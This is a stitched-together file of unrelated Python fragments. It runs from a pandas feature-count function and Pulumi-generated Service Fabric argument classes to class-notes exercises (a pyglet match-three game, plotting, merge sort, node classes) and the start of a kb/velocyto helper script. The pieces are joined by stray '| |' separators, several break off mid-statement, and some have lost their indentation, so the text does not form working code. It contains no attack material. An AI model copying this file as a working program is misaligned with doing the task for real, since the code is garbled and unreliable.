    against the fixed window '3_18' + '3_19'.

    Args:
        train, val (pd.DataFrame): must contain columns `fea` and 'Reqday';
            val holds the last day ('3_19') and is re-split off at the end.
        test (np.ndarray): raw comma-joined feature strings for the test set.
        fea (str): feature column name.
        date (list[str]): ordered day labels; window (date[i], date[i+1])
            scores day date[i+2].
        flag: unused; kept for interface compatibility.

    Returns:
        tuple: (train stats, val stats, test stats); train/val have shape
        (n, 2); test keeps the original's shape quirk ((2,) for one row).
    """
    count_dict = {}
    test_res = None
    train = pd.concat([train, val])
    num1 = train[train['Reqday'] == '2_16'].shape[0]
    num2 = train[train['Reqday'] == '3_19'].shape[0]
    num3 = train.shape[0]
    # First-day rows get placeholder [-1, -1] statistics.
    train_res = np.array([-1] * num1 * 2).reshape(num1, 2)
    # Bootstrap: count 2_16, score 2_17 (not halved — one-day window).
    for value in train[train['Reqday'] == '2_16'][fea].values:
        for v in value.split(','):
            if v not in count_dict:
                count_dict[v] = 0
            count_dict[v] += 1
    if '-1' not in count_dict:
        count_dict['-1'] = 1
    for value in train[train['Reqday'] == '2_17'][fea].values:
        row = [count_dict[v if v in count_dict else '-1'] for v in value.split(',')]
        # np.vstack replaces the deprecated np.row_stack (same semantics).
        train_res = np.vstack((train_res, [np.max(row), np.mean(row)]))
    # Rolling window: count (date[i+1], date[i]), score date[i+2].
    for i in range(len(date) - 2):
        count_dict = {}
        train_compute = train[train['Reqday'] == date[i + 2]][fea].values
        count_train = pd.concat([train[train['Reqday'] == date[i + 1]],
                                 train[train['Reqday'] == date[i]]])
        for value in count_train[fea].values:
            for v in value.split(','):
                if v not in count_dict:
                    count_dict[v] = 0
                count_dict[v] += 1
        if '-1' not in count_dict:
            count_dict['-1'] = 1
        for value in train_compute:
            row = [count_dict[v if v in count_dict else '-1'] for v in value.split(',')]
            l = np.array([max(row), np.mean(row)])
            # Halved: counts cover a two-day window.
            train_res = np.vstack((train_res, l / 2))
    # Split back: the last num2 rows belong to the val day ('3_19').
    train_res1 = train_res[:num3 - num2]
    val_res = train_res[-num2:]
    # Test rows are scored against the fixed '3_18' + '3_19' window.
    count_dict = {}
    test_flag = 1
    count_train = pd.concat([train[train['Reqday'] == '3_18'],
                             train[train['Reqday'] == '3_19']])
    for value in count_train[fea].values:
        # Fixed: the original split on the literal string '-1' here
        # (value.split('-1')), inconsistent with every other comma split
        # in this function, so multi-value rows were counted as one token.
        for v in value.split(','):
            if v not in count_dict:
                count_dict[v] = 0
            count_dict[v] += 1
    if '-1' not in count_dict:
        count_dict['-1'] = 1
    print(test.shape)
    for value in test:
        row = [count_dict[v if v in count_dict else '-1'] for v in value.split(',')]
        l = np.array([max(row), np.mean(row)])
        if test_flag == 1:
            test_flag = 0
            test_res = l / 2
        else:
            test_res = np.vstack((test_res, l / 2))
    print(test_res)
    return np.array(train_res1), np.array(val_res), np.array(test_res)
def one_feature_exposure(train, val, test, fea, date):
# 返回曝光的最大值,最小值,均值,中位数四个值,
# 返回bid的最大值,最小值,均值,中位数四个值,
val_res = []
test_res = []
train_res = []
val_res2 = []
test_res2 = []
train_res2 = []
train_res3 = []
Train = pd.concat([train, val])
num1 = train[train['Reqday'] == '2_16'].shape[0]
for i in range(num1):
train_res.append([8, 8, 8, 8])
train_res2.append([8, 8, 8, 8])
train_count = train[train['Reqday'] == '2_16']
train_compute = train[train['Reqday'] == '2_17']
exposure_dict = {}
bid_dict = {}
for value in train_count[fea].values:
if value not in exposure_dict:
train1 = train_count[train_count[fea] == value]['exposure'].values
exposure_dict[value] = []
bid_dict[value] = []
exposure_dict[value].append(np.max(train1))
exposure_dict[value].append(np.min(train1))
exposure_dict[value].append(np.mean(train1))
exposure_dict[value].append(np.median(train1))
train2 = train_count[train_count[fea] == value]['adBid'].values
bid_dict[value].append(np.max(train2))
bid_dict[value].append(np.min(train2))
bid_dict[value].append(np.mean(train2))
bid_dict[value].append(np.median(train2))
if '-1' not in exposure_dict:
exposure_dict['-1'] = [8, 8, 8, 8]
bid_dict['-1'] = [8, 8, 8, 8]
for value in train_compute[fea].values:
if value not in exposure_dict:
value = '-1'
train_res.append(exposure_dict[value])
train_res2.append(bid_dict[value])
for i in range(len(date) - 2):
day1 = date[i+2]
day2 = date[i+1]
day3 = date[i]
train1 = Train[Train['Reqday'] == day3]
train2 = Train[Train['Reqday'] == day2]
train_compute = Train[Train['Reqday'] == day1]
train_count = pd.concat([train1, train2])
exposure_dict = {}
bid_dict = {}
for value in train_count[fea].values:
if value not in exposure_dict:
exposure_dict[value] = []
bid_dict[value] = []
train1 = train_count[train_count[fea] == value]['exposure'].values
exposure_dict[value].append(np.max(train1))
exposure_dict[value].append(np.min(train1))
exposure_dict[value].append(np.mean(train1))
exposure_dict[value].append(np.median(train1))
train2 = train_count[train_count[fea] == value]['adBid'].values
bid_dict[value].append(np.max(train2))
bid_dict[value].append(np.min(train2))
bid_dict[value].append(np.mean(train2))
bid_dict[value].append(np.median(train2))
if '-1' not in exposure_dict:
exposure_dict['-1'] = [8, 8, 8, 8]
bid_dict['-1'] = [8, 8, 8, 8]
for value in train_compute[fea].values:
if value not in exposure_dict:
value = '-1'
train_res.append(exposure_dict[value])
train_res2.append(bid_dict[value])
train_res1 = train_res[:(Train.shape[0] - val.shape[0])]
val_res = | |
placement policy for a service fabric service. Following are the possible values.
Expected value is 'PreferredPrimaryDomain'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ServicePlacementRequireDomainDistributionPolicyArgs:
    # Pulumi input type in generated-SDK style: values are stored/retrieved
    # through pulumi.set/pulumi.get rather than plain attributes.
    def __init__(__self__, *,
                 domain_name: pulumi.Input[str],
                 type: pulumi.Input[str]):
        """
        Describes the policy to be used for placement of a Service Fabric service where two replicas
        from the same partition should never be placed in the same fault or upgrade domain.
        While this is not common it can expose the service to an increased risk of concurrent failures
        due to unplanned outages or other cases of subsequent/concurrent failures. As an example, consider
        a case where replicas are deployed across different data center, with one replica per location.
        In the event that one of the datacenters goes offline, normally the replica that was placed in that
        datacenter will be packed into one of the remaining datacenters. If this is not desirable then this
        policy should be set.
        :param pulumi.Input[str] domain_name: The name of the domain that should used for placement as per this policy.
        :param pulumi.Input[str] type: The type of placement policy for a service fabric service. Following are the possible values.
               Expected value is 'RequiredDomainDistribution'.
        """
        pulumi.set(__self__, "domain_name", domain_name)
        # NOTE: the `type` argument is accepted for signature compatibility but
        # its value is discarded — the discriminator literal is always stored.
        pulumi.set(__self__, "type", 'RequiredDomainDistribution')

    @property
    @pulumi.getter(name="domainName")
    def domain_name(self) -> pulumi.Input[str]:
        """
        The name of the domain that should used for placement as per this policy.
        """
        return pulumi.get(self, "domain_name")

    @domain_name.setter
    def domain_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_name", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        The type of placement policy for a service fabric service. Following are the possible values.
        Expected value is 'RequiredDomainDistribution'.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class ServicePlacementRequiredDomainPolicyArgs:
    # Pulumi input type in generated-SDK style: values are stored/retrieved
    # through pulumi.set/pulumi.get rather than plain attributes.
    def __init__(__self__, *,
                 domain_name: pulumi.Input[str],
                 type: pulumi.Input[str]):
        """
        Describes the policy to be used for placement of a Service Fabric service where the instances or replicas of that service must be placed in a particular domain.
        :param pulumi.Input[str] domain_name: The name of the domain that should used for placement as per this policy.
        :param pulumi.Input[str] type: The type of placement policy for a service fabric service. Following are the possible values.
               Expected value is 'RequiredDomain'.
        """
        pulumi.set(__self__, "domain_name", domain_name)
        # NOTE: the `type` argument is accepted for signature compatibility but
        # its value is discarded — the discriminator literal is always stored.
        pulumi.set(__self__, "type", 'RequiredDomain')

    @property
    @pulumi.getter(name="domainName")
    def domain_name(self) -> pulumi.Input[str]:
        """
        The name of the domain that should used for placement as per this policy.
        """
        return pulumi.get(self, "domain_name")

    @domain_name.setter
    def domain_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_name", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        The type of placement policy for a service fabric service. Following are the possible values.
        Expected value is 'RequiredDomain'.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class ServiceTypeHealthPolicyArgs:
    # Pulumi input type in generated-SDK style; all three thresholds are
    # required integers stored verbatim via pulumi.set.
    def __init__(__self__, *,
                 max_percent_unhealthy_partitions_per_service: pulumi.Input[int],
                 max_percent_unhealthy_replicas_per_partition: pulumi.Input[int],
                 max_percent_unhealthy_services: pulumi.Input[int]):
        """
        Represents the health policy used to evaluate the health of services belonging to a service type.
        :param pulumi.Input[int] max_percent_unhealthy_partitions_per_service: The maximum allowed percentage of unhealthy partitions per service.
               The percentage represents the maximum tolerated percentage of partitions that can be unhealthy before the service is considered in error.
               If the percentage is respected but there is at least one unhealthy partition, the health is evaluated as Warning.
               The percentage is calculated by dividing the number of unhealthy partitions over the total number of partitions in the service.
               The computation rounds up to tolerate one failure on small numbers of partitions.
        :param pulumi.Input[int] max_percent_unhealthy_replicas_per_partition: The maximum allowed percentage of unhealthy replicas per partition.
               The percentage represents the maximum tolerated percentage of replicas that can be unhealthy before the partition is considered in error.
               If the percentage is respected but there is at least one unhealthy replica, the health is evaluated as Warning.
               The percentage is calculated by dividing the number of unhealthy replicas over the total number of replicas in the partition.
               The computation rounds up to tolerate one failure on small numbers of replicas.
        :param pulumi.Input[int] max_percent_unhealthy_services: The maximum allowed percentage of unhealthy services.
               The percentage represents the maximum tolerated percentage of services that can be unhealthy before the application is considered in error.
               If the percentage is respected but there is at least one unhealthy service, the health is evaluated as Warning.
               This is calculated by dividing the number of unhealthy services of the specific service type over the total number of services of the specific service type.
               The computation rounds up to tolerate one failure on small numbers of services.
        """
        pulumi.set(__self__, "max_percent_unhealthy_partitions_per_service", max_percent_unhealthy_partitions_per_service)
        pulumi.set(__self__, "max_percent_unhealthy_replicas_per_partition", max_percent_unhealthy_replicas_per_partition)
        pulumi.set(__self__, "max_percent_unhealthy_services", max_percent_unhealthy_services)

    @property
    @pulumi.getter(name="maxPercentUnhealthyPartitionsPerService")
    def max_percent_unhealthy_partitions_per_service(self) -> pulumi.Input[int]:
        """
        The maximum allowed percentage of unhealthy partitions per service.
        The percentage represents the maximum tolerated percentage of partitions that can be unhealthy before the service is considered in error.
        If the percentage is respected but there is at least one unhealthy partition, the health is evaluated as Warning.
        The percentage is calculated by dividing the number of unhealthy partitions over the total number of partitions in the service.
        The computation rounds up to tolerate one failure on small numbers of partitions.
        """
        return pulumi.get(self, "max_percent_unhealthy_partitions_per_service")

    @max_percent_unhealthy_partitions_per_service.setter
    def max_percent_unhealthy_partitions_per_service(self, value: pulumi.Input[int]):
        pulumi.set(self, "max_percent_unhealthy_partitions_per_service", value)

    @property
    @pulumi.getter(name="maxPercentUnhealthyReplicasPerPartition")
    def max_percent_unhealthy_replicas_per_partition(self) -> pulumi.Input[int]:
        """
        The maximum allowed percentage of unhealthy replicas per partition.
        The percentage represents the maximum tolerated percentage of replicas that can be unhealthy before the partition is considered in error.
        If the percentage is respected but there is at least one unhealthy replica, the health is evaluated as Warning.
        The percentage is calculated by dividing the number of unhealthy replicas over the total number of replicas in the partition.
        The computation rounds up to tolerate one failure on small numbers of replicas.
        """
        return pulumi.get(self, "max_percent_unhealthy_replicas_per_partition")

    @max_percent_unhealthy_replicas_per_partition.setter
    def max_percent_unhealthy_replicas_per_partition(self, value: pulumi.Input[int]):
        pulumi.set(self, "max_percent_unhealthy_replicas_per_partition", value)

    @property
    @pulumi.getter(name="maxPercentUnhealthyServices")
    def max_percent_unhealthy_services(self) -> pulumi.Input[int]:
        """
        The maximum allowed percentage of unhealthy services.
        The percentage represents the maximum tolerated percentage of services that can be unhealthy before the application is considered in error.
        If the percentage is respected but there is at least one unhealthy service, the health is evaluated as Warning.
        This is calculated by dividing the number of unhealthy services of the specific service type over the total number of services of the specific service type.
        The computation rounds up to tolerate one failure on small numbers of services.
        """
        return pulumi.get(self, "max_percent_unhealthy_services")

    @max_percent_unhealthy_services.setter
    def max_percent_unhealthy_services(self, value: pulumi.Input[int]):
        pulumi.set(self, "max_percent_unhealthy_services", value)
@pulumi.input_type
class SettingsParameterDescriptionArgs:
    # Pulumi input type in generated-SDK style: a plain name/value pair
    # stored via pulumi.set and read back via pulumi.get.
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 value: pulumi.Input[str]):
        """
        Describes a parameter in fabric settings of the cluster.
        :param pulumi.Input[str] name: The parameter name of fabric setting.
        :param pulumi.Input[str] value: The parameter value of fabric setting.
        """
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The parameter name of fabric setting.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        """
        The parameter value of fabric setting.
        """
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: pulumi.Input[str]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class SettingsSectionDescriptionArgs:
    # Pulumi input type in generated-SDK style: a named section holding a
    # sequence of SettingsParameterDescriptionArgs entries.
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 parameters: pulumi.Input[Sequence[pulumi.Input['SettingsParameterDescriptionArgs']]]):
        """
        Describes a section in the fabric settings of the cluster.
        :param pulumi.Input[str] name: The section name of the fabric settings.
        :param pulumi.Input[Sequence[pulumi.Input['SettingsParameterDescriptionArgs']]] parameters: The collection of parameters in the section.
        """
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "parameters", parameters)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The section name of the fabric settings.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def parameters(self) -> pulumi.Input[Sequence[pulumi.Input['SettingsParameterDescriptionArgs']]]:
        """
        The collection of parameters in the section.
        """
        return pulumi.get(self, "parameters")

    @parameters.setter
    def parameters(self, value: pulumi.Input[Sequence[pulumi.Input['SettingsParameterDescriptionArgs']]]):
        pulumi.set(self, "parameters", value)
@pulumi.input_type
class SingletonPartitionSchemeArgs:
def __init__(__self__, *,
partition_scheme: pulumi.Input[str]):
"""
Describes the partition scheme of a singleton-partitioned, or non-partitioned service.
:param pulumi.Input[str] partition_scheme: Enumerates the ways that a service can be partitioned.
Expected value is 'Singleton'.
"""
pulumi.set(__self__, "partition_scheme", 'Singleton')
@property
@pulumi.getter(name="partitionScheme")
def partition_scheme(self) -> pulumi.Input[str]:
"""
Enumerates the ways that a service can be partitioned.
Expected value is 'Singleton'.
"""
return pulumi.get(self, "partition_scheme")
@partition_scheme.setter
def partition_scheme(self, value: | |
# Source: jlmucb/class_notes — IoT/code/py/p3.py (dataset artifact converted to a comment)
def calc_miles(gallons, mpg=20.0):
    """Return how many miles `gallons` of fuel covers at `mpg` miles/gallon."""
    distance = mpg * gallons
    return distance

# Demo: explicit mpg, then the 20.0-mpg default.
print( calc_miles(10.0, 15.0) )
print( calc_miles(10.0) )
# Parse each record's date and collect it alongside that day's readings.
# NOTE(review): infile, date, lowtemp, hightemp, rainfall and datalist are
# created in text elided from this excerpt ("STUFF DELETED HERE") — confirm
# their definitions before relying on this block.
for line in infile:
    #STUFF DELETED HERE
    m, d, y = date.split('/')
    month = int(m)
    day = int(d)
    year = int(y)
    #Put data into list: records are stored as [day, month, year, low, high, rain]
    datalist.append([day, month, year, lowtemp, hightemp,
        rainfall])
#STUFF DELETED HERE
#Find historical data for date
gooddata = []
for singleday in datalist:
    # BUG FIX: records are [day, month, ...] but the original compared
    # index 0 (day) against `month` and index 1 (month) against `day`,
    # matching transposed dates. Compare like-for-like fields instead.
    if (singleday[0] == day) and (singleday[1] == month):
        gooddata.append([singleday[2], singleday[3],
            singleday[4], singleday[5]])
from random import choice
import pyglet

# Main game window: an 8x8 board of 50px cells plus a 50px status strip.
window = pyglet.window.Window(width=400, height = 450,
    caption="GameWindow")

# Piece sprites: board letters 'A'..'E' map to Im1..Im5 in on_draw.
Im1 = pyglet.image.load('BlueTri.jpg')
Im2 = pyglet.image.load('PurpleStar.jpg')
# BUG FIX: the original assigned the bare filename string
# (`Im3 = ('OrangeDiamond.jpg')`), so Im3.blit(...) in on_draw would raise
# AttributeError. Load the image like the other four sprites.
Im3 = pyglet.image.load('OrangeDiamond.jpg')
Im4 = pyglet.image.load('YellowCircle.jpg')
Im5 = pyglet.image.load('RedHex.jpg')
def InitializeGrid(board):
    """Fill every cell of the 8x8 board with a random piece letter."""
    piece_types = ['A', 'B', 'C', 'D', 'E']
    for row in range(8):
        for col in range(8):
            board[row][col] = choice(piece_types)
def Initialize(board):
    """Start a fresh game: random board, score reset to 0, turn counter at 1."""
    # Fill the grid with random pieces.
    InitializeGrid(board)
    # Reset the module-level game state read by the event handlers.
    global score, turn
    score = 0
    turn = 1
    #Set up graphical info
def ContinueGame(current_score, goal_score = 100):
    """Return True while the game should continue (goal not yet reached)."""
    return current_score < goal_score
def SwapPieces(board, move):
    """Exchange the cells (move[0], move[1]) and (move[2], move[3])."""
    board[move[0]][move[1]], board[move[2]][move[3]] = (
        board[move[2]][move[3]],
        board[move[0]][move[1]],
    )
def RemovePieces(board):
    """Clear every 3-in-a-row / 3-in-a-column match from the board.

    Matched cells are set to 0, the global score gains one point per
    cleared cell, and True is returned iff at least one cell was cleared.
    """
    #Create board to store remove-or-not
    remove = [[0] * 8 for _ in range(8)]
    #Go through rows
    for i in range(8):
        # BUG FIX: the original line read
        # "for j inpyglet.image.load range(6):" — pasted-in text that made
        # this function a syntax error.
        for j in range(6):
            if (board[i][j] == board[i][j+1]) and (board[i][j] == board[i][j+2]):
                #three in a row are the same!
                remove[i][j] = 1
                remove[i][j+1] = 1
                remove[i][j+2] = 1
    #Go through columns
    for j in range(8):
        for i in range(6):
            if (board[i][j] == board[i+1][j]) and (board[i][j] == board[i+2][j]):
                #three in a column are the same!
                remove[i][j] = 1
                remove[i+1][j] = 1
                remove[i+2][j] = 1
    #Eliminate those marked, scoring one point per cleared cell
    global score
    removed_any = False
    for i in range(8):
        for j in range(8):
            if remove[i][j] == 1:
                board[i][j] = 0
                score += 1
                removed_any = True
    return removed_any
def DropPieces(board):
    """Compact each column: slide non-zero pieces to the low indices, pad with 0."""
    for col in range(8):
        # Surviving pieces in this column, in their current top-to-bottom order.
        kept = [board[row][col] for row in range(8) if board[row][col] != 0]
        # Rewrite the column: kept pieces first, zeros filling the remainder.
        for row in range(8):
            board[row][col] = kept[row] if row < len(kept) else 0
def FillBlanks(board):
    """Replace every cleared (0) cell with a fresh random piece letter."""
    piece_types = ['A', 'B', 'C', 'D', 'E']
    for row in range(8):
        for col in range(8):
            if board[row][col] != 0:
                continue
            board[row][col] = choice(piece_types)
def Update(board, move):
    """Apply a move, then clear matches / drop pieces / refill until stable."""
    SwapPieces(board, move)
    keep_clearing = True
    while keep_clearing:
        # Clear any matches; drop and refill run once more after the final
        # (empty) clearing pass, exactly as in the original game loop.
        keep_clearing = RemovePieces(board)
        DropPieces(board)
        FillBlanks(board)
@window.event
def on_draw():
    """Redraw the whole board plus the turn/score status line."""
    window.clear()
    for i in range(7,-1,-1):
        #Draw each row
        # Row i occupies the 50px band starting at y = 50 + 50*i (the
        # bottom 50px strip is reserved for the status label).
        y = 50+50*i
        for j in range(8):
            #draw each piece, first getting position
            x = 50*j
            # Map the cell's letter to its sprite.
            if board[i][j] == 'A':
                Im1.blit(x,y)
            elif board[i][j] == 'B':
                Im2.blit(x,y)
            elif board[i][j] == 'C':
                Im3.blit(x,y)
            elif board[i][j] == 'D':
                Im4.blit(x,y)
            elif board[i][j] == 'E':
                Im5.blit(x,y)
    # NOTE(review): no separator between the turn number and "Score:" —
    # this renders e.g. "Turn: 3Score: 10". Probably wants a space/newline.
    label = pyglet.text.Label('Turn: '+str(turn)+
        'Score: '+str(score), font_name='Arial', font_size=18, x=20,
        y = 10)
    label.draw()
@window.event
def on_mouse_press(x, y, button, modifiers):
    """Remember where the drag started, in window pixel coordinates."""
    #Get the starting cell
    # Stored in module globals so on_mouse_release can pair the press
    # position with the release position.
    global startx
    global starty
    startx = x
    starty = y
@window.event
def on_mouse_release(x, y, button, modifiers):
    """Finish a drag: if the start and end cells are adjacent, apply the move."""
    #Get starting and ending cell and see if they are adjacent
    # Cells are 50px; the board starts 50px up (status strip at the bottom).
    startcol = startx//50
    startrow = (starty-50)//50
    endcol = x//50
    endrow = (y-50)//50
    # BUG FIX: in the original this comment wrapped so that "make move."
    # landed on its own uncommented line — a syntax error.
    # Check whether ending is adjacent to starting and if so, make move.
    if ((startcol==endcol and startrow==endrow - 1)
            or (startcol==endcol and startrow==endrow+1) or
            (startrow==endrow and startcol==endcol-1) or
            (startrow==endrow and startcol==endcol+1)):
        Update(board, [startrow, startcol, endrow, endcol])
        global turn
        turn += 1
        #See if game is over
        if not ContinueGame(score):
            print("You won in", turn, "turns!")
            exit()
#State main variables
# NOTE(review): score and turn are set to 100 here but Initialize()
# immediately resets them (score=0, turn=1); goalscore is never read in
# this excerpt — ContinueGame relies on its default goal_score=100.
score = 100
turn = 100
goalscore = 100
# 8x8 playing field; 0 marks an empty cell until Initialize fills it.
board = [[0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0],
    [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0],
    [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0],
    [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0]]
#Initialize game
Initialize(board)
# Enter the pyglet event loop (blocks; drives on_draw and the mouse handlers).
pyglet.app.run()
from matplotlib import pyplot

# Plot y = x**2 at the integer points 0..5.
pyplot.plot([0,1,2,3,4,5], [0,1,4,9,16,25])
# Pin the axes to x in [0, 5], y in [0, 25].
pyplot.axis([0,5,0,25])
# Open the interactive plot window (blocks until closed).
pyplot.show()
from matplotlib.pyplot import plot, show

# Simulate a $1000 balance earning 3% interest, compounded once a year,
# over ten years.
time = 0
balance = 1000

# Parallel histories of simulated years and balances (year 0 included).
timelist = [time]
balancelist = [balance]

while (time < 10):
    # Apply one year of 3% growth, then advance the clock.
    balance += balance * 0.03
    time += 1
    timelist.append(time)
    balancelist.append(balance)

# Report the trajectory, then chart it.
for year, amount in zip(timelist, balancelist):
    print("Year:", year, " Balance:", amount)
plot(timelist, balancelist)
show()
class BankAccount:
    """Toy account illustrating class attributes vs. per-instance state."""

    balance = 0.0  # class attribute: a shared default starting balance

    def __init__(self):
        # Created per instance, so each account has its own deposit history.
        self.deposits = []
# Each BankAccount instance builds its own deposits list in __init__,
# so appending to one account does not affect the other.
checking_account = BankAccount()
savings_account = BankAccount()
checking_account.deposits.append(100.0)
print(savings_account.deposits)  # prints [] — the lists are not shared
class FootballPlayer:
    """Base record for a football player (teaching example)."""

    name = "<NAME>"
    team = "None"
    years_in_league = 0

    def printPlayer(self):
        """Print a one-line description of this player."""
        print(f"{self.name} playing for the {self.team}:")
class Quarterback(FootballPlayer):
    """Passer stats layered on the base player record."""

    pass_attempts = 0
    completions = 0
    pass_yards = 0

    def yardsPerAttempt(self):
        """Average passing yards gained per attempt."""
        return self.pass_yards / self.pass_attempts

    def completionRate(self):
        """Fraction of pass attempts that were completed."""
        return self.completions / self.pass_attempts
class RunningBack(FootballPlayer):
    """Rushing stats layered on the base player record."""

    rushes = 0
    rush_yards = 0

    def yardsPerRush(self):
        """Average yards gained per rushing attempt."""
        return self.rush_yards / self.rushes
class FootballPlayer:
    """Base player record; subclasses are expected to override isGood()."""

    name = "<NAME>"
    team = "None"
    years_in_league = 0

    def printPlayer(self):
        """Print a one-line description of this player."""
        print(f"{self.name} playing for the {self.team}:")

    def isGood(self):
        """Fallback for subclasses that forget to override; always False."""
        print("Error! isGood is not defined!")
        return False
class Quarterback(FootballPlayer):
    """Passer whose quality is judged by yards per attempt."""

    pass_attempts = 0
    completions = 0
    pass_yards = 0

    def yardsPerAttempt(self):
        """Average passing yards gained per attempt."""
        return self.pass_yards / self.pass_attempts

    def completionRate(self):
        """Fraction of pass attempts that were completed."""
        return self.completions / self.pass_attempts

    def isGood(self):
        """A quarterback is good when he averages more than 7 yards/attempt."""
        return self.yardsPerAttempt() > 7
class RunningBack(FootballPlayer):
    """Rusher whose quality is judged by yards per carry."""

    rushes = 0
    rush_yards = 0

    def yardsPerRush(self):
        """Average yards gained per rushing attempt."""
        return self.rush_yards / self.rushes

    def isGood(self):
        """A running back is good when he averages more than 4 yards/rush."""
        return self.yardsPerRush() > 4
# Simple FIFO queue of books built on a plain list.
# NOTE(review): medium_book / short_book / long_book are not defined in this
# excerpt — presumably created in elided surrounding text.
book_queue = []
book_queue.append(medium_book)
book_queue.append(short_book)
book_queue.append(long_book)
# pop(0) removes from the front → FIFO order. (O(n) on a list; a
# collections.deque would make the front-pop O(1).)
next_book = book_queue.pop(0)
def isIn(L, v):
    """Return True if value v occurs in sequence L, else False.

    The original scanned with a manual while-loop and index; the `in`
    operator performs the same left-to-right == comparison idiomatically.
    """
    return v in L
# BUG FIX: in the original pasted text the 'chicken and dumplings' literal
# was broken across two lines (an unterminated string), and the expected
# OUTPUT lines sat as bare, syntactically invalid text. The literal is
# rejoined and the expected output preserved as comments.
favorite_foods = ['pizza', 'barbeque', 'gumbo', 'chicken and dumplings',
    'pecan pie', 'ice cream']
print(isIn(favorite_foods, 'gumbo'))
print(isIn(favorite_foods, 'coconut'))
# OUTPUT:
# True
# False
def mergeSort(L):
    """Sort list L in place using recursive merge sort."""
    if len(L) <= 1:
        return  # zero or one element: already sorted
    mid = len(L) // 2
    left, right = L[:mid], L[mid:]
    mergeSort(left)
    mergeSort(right)
    merge(L, left, right)


def merge(L, L1, L2):
    """Merge sorted lists L1 and L2 into L, overwriting L[0:len(L1)+len(L2)]."""
    j = 0  # cursor into L1
    k = 0  # cursor into L2
    for i in range(len(L1) + len(L2)):
        # Pull from L1 when L2 is exhausted or L1's head is strictly smaller
        # (ties go to L2, matching the original comparison).
        if j < len(L1) and (k >= len(L2) or L1[j] < L2[k]):
            L[i] = L1[j]
            j += 1
        else:
            L[i] = L2[k]
            k += 1
def merge(L, L1, L2):
    """Merge sorted lists L1 and L2 into L, overwriting L[0:len(L1)+len(L2)]."""
    i = 0
    j = 0
    k = 0
    while (j < len(L1)) or (k < len(L2)):
        if j < len(L1):
            if k < len(L2):
                # BUG FIX: in the original this comment wrapped so that
                # "smaller value" landed on an uncommented line — a syntax
                # error.
                # We are not at the end of L1 or L2, so pull the smaller value.
                if L1[j] < L2[k]:
                    L[i] = L1[j]
                    j += 1
                else:
                    L[i] = L2[k]
                    k += 1
            else:
                #we are at the end of L2, so just pull from L1
                L[i] = L1[j]
                j += 1
        else:
            #we are at the end of L1, so just pull from L2
            L[i] = L2[k]
            k += 1
        i += 1
    return
class node:
    """Binary-tree node: a name plus parent/left/right indices (-1 = absent)."""

    def __init__(self, name, parent=-1):
        self._name = name
        self._parent = parent
        # Children start unset; callers attach them via the setters below.
        self._left = -1
        self._right = -1

    def getName(self):
        """Return this node's name."""
        return self._name

    def getParent(self):
        """Return the parent index (-1 when this node is the root)."""
        return self._parent

    def getLeft(self):
        """Return the left-child index (-1 when absent)."""
        return self._left

    def getRight(self):
        """Return the right-child index (-1 when absent)."""
        return self._right

    def setParent(self, p):
        """Set the parent index."""
        self._parent = p

    def setLeft(self, l):
        """Set the left-child index."""
        self._left = l

    def setRight(self, r):
        """Set the right-child index."""
        self._right = r
class node:
def __init__(self, name):
self._name = name
self._friends = []
self._status = 0
self._discoveredby = 0
def getName(self):
return self._name
def getFriends(self):
return self._friends
def addFriend(self, friend_index):
self._friends.append(friend_index)
def isUnseen(self):
if self._status == 0:
return True
else:
return False
def isSeen(self):
if self._status == 1:
return True
| |
#!/usr/bin/env python
import argparse
import datetime
import os
import pathlib
import posixpath
import re
import subprocess
import tarfile
import time
import sys
import shutil
import glob
from collections import defaultdict
import utilities.log_util as ut_log
import utilities.s3_util as s3u
import boto3
from boto3.s3.transfer import TransferConfig
def get_default_requirements():
    """Default compute requirements (vCPUs, memory, storage, image) for velocyto jobs."""
    return argparse.Namespace(
        vcpus=16,
        memory=64000,
        storage=500,
        ecr_image="velocyto",
    )
def display_info(logger):
    """Displays kb, kallisto and bustools version + citation information, along
    with a brief description and examples.

    Keyword Argument:
    logger -- Logger of main function (type: logging.Logger)

    Returns True on success; raises RuntimeError when `kb info` fails.
    """
    info_command = ["kb", "info"]
    # BUG FIX: the original called subprocess.run(..., **kwargs) without ever
    # defining `kwargs` (a NameError) and left a dangling `else:` from a
    # half-finished edit (the commented-out ut_log.log_command variant).
    # The run options below mirror the ones used elsewhere in this module.
    proc = subprocess.run(
        " ".join(info_command),
        shell=True,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        universal_newlines=True,
    )
    if proc.returncode != 0:
        # Surface the captured output when available; fall back to a
        # generic message otherwise.
        if proc.stdout and isinstance(proc.stdout, str):
            raise RuntimeError(proc.stdout)
        elif isinstance(proc.stdout, bytes):
            raise RuntimeError(proc.stdout.decode())
        raise RuntimeError("`info` command failed")
    return True
def display_technologies(logger):
    """Displays a list of supported technologies along with whether kb provides
